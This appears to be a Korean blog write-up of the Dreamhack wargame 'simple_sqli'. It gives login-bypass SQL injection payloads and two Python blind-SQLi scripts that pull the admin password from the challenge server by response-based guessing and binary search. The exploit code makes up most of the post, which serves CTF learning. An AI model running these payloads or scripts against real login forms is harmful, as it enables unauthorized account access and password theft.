
[Dreamhack Wargame] Simple_sqli + blind SQLI 스크립트

민사민서 2023. 6. 28. 22:21
  • 일반 풀이
SELECT * FROM users WHERE userid="admin"-- " AND userpassword="DUMMY"
SELECT * FROM users WHERE userid="admin" or "1" AND userpassword="DUMMY"
SELECT * FROM users WHERE userid="" or 1 LIMIT 1,1-- " AND userpassword="DUMMY"
  • 파이썬 스크립트 이용한 blind SQLI 풀이
import requests
import string

url = 'http://host3.dreamhack.games:18628/login'
data = {
    'userid': '',
    'userpassword': ''
}
# Only the userid field is injected; the trailing "--" comments out the rest
# of the login query, as in the one-line payloads shown above. The script
# treats the substring 'hello' in the response as a "character matched" hit,
# so the page's normal/failed login output acts as a boolean oracle.
payload = 'admin" and substr(userpassword,{idx},1)=="{x}" --'
# Alphabet and length (32) come from the quoted challenge source below: the
# admin password is 16 random bytes, hex-encoded. That is why the author
# calls this version "not fully blind".
hex_alphabet = string.digits + 'abcdef'
admin_pw = ''

for position in range(1, 33):
    for candidate in hex_alphabet:
        data['userid'] = payload.format(idx=position, x=candidate)
        response = requests.post(url, data=data)
        if 'hello' not in response.text:
            continue
        admin_pw += candidate
        print(admin_pw)
        break

사실 이 코드도 아래 소스코드를 보고 자릿수/포맷 파악했기에 완전한 blind SQLI라 할 수 없다

# Quoted from the challenge source: the admin row is seeded with 16 random
# bytes, hex-encoded, i.e. a 32-character [0-9a-f] password - which is exactly
# what the first script's range(1, 33) and hex alphabet rely on. The values
# here are literals, but the statement is still assembled with an f-string;
# presumably the login query is built the same way from user input, which is
# what makes it injectable (verify in the challenge source). Parameter
# binding - passing values separately from the SQL text - is the fix.
db.execute(f'insert into users(userid, userpassword) values ("guest", "guest"), ("admin", "{binascii.hexlify(os.urandom(16)).decode("utf8")}");')

 

  • 개선된 blind SQLI python script 코드
import requests
import string

url = 'http://host3.dreamhack.games:11937/login'
data = {
    'userid': '',
    'userpassword': ''
}

# Step 1: recover the password length without assuming anything about the
# stored value. length(userpassword) <= N is probed for N = 1, 2, ...; the
# first N whose response contains 'hello' is the length.
pay = 'admin" and length(userpassword)<={len} --'
# NOTE: `len` shadows the builtin for the rest of the module; the name is kept
# because the character loop further down reads it.
len = 0
while True:
    len += 1
    data['userid'] = pay.format(len=len)
    reply = requests.post(url, data=data)
    if 'hello' in reply.text:
        break
print(len)


def find_digit(idx, l, h):
    """Return the character code at 1-based position ``idx`` of the admin password.

    Binary-searches the closed range [l, h]; the true code must lie inside it.
    Each probe asks the server whether the character sorts below CHAR(mid) and
    reads the presence of 'hello' in the response as the yes/no answer, so the
    search needs about log2(h - l) requests per character.

    Args:
        idx: position passed to SQL substr() (first character is 1).
        l: lowest candidate code.
        h: highest candidate code.

    Returns:
        The code in [l, h] at which the search converges.
    """
    probe = 'admin" and substr(userpassword,{idx},1) < CHAR({x}) --'
    lo, hi = l, h
    while lo < hi:
        # Upper midpoint so that lo + 1 == hi still makes progress.
        mid = (lo + hi + 1) // 2
        data['userid'] = probe.format(idx=idx, x=mid)
        reply = requests.post(url, data=data)
        if 'hello' in reply.text:
            hi = mid - 1  # character < mid
        else:
            lo = mid  # character >= mid
    return lo

# Step 2: recover each character by binary search over printable ASCII
# (0x20..0x7f). `len` is the module-level length found above (it shadows the
# builtin). Beyond "every character is printable ASCII", nothing is assumed
# from the challenge source - the improvement over the first script.
admin_pw = ''
for position in range(1, len + 1):
    code = find_digit(position, 32, 127)
    admin_pw += chr(code)
    print(admin_pw)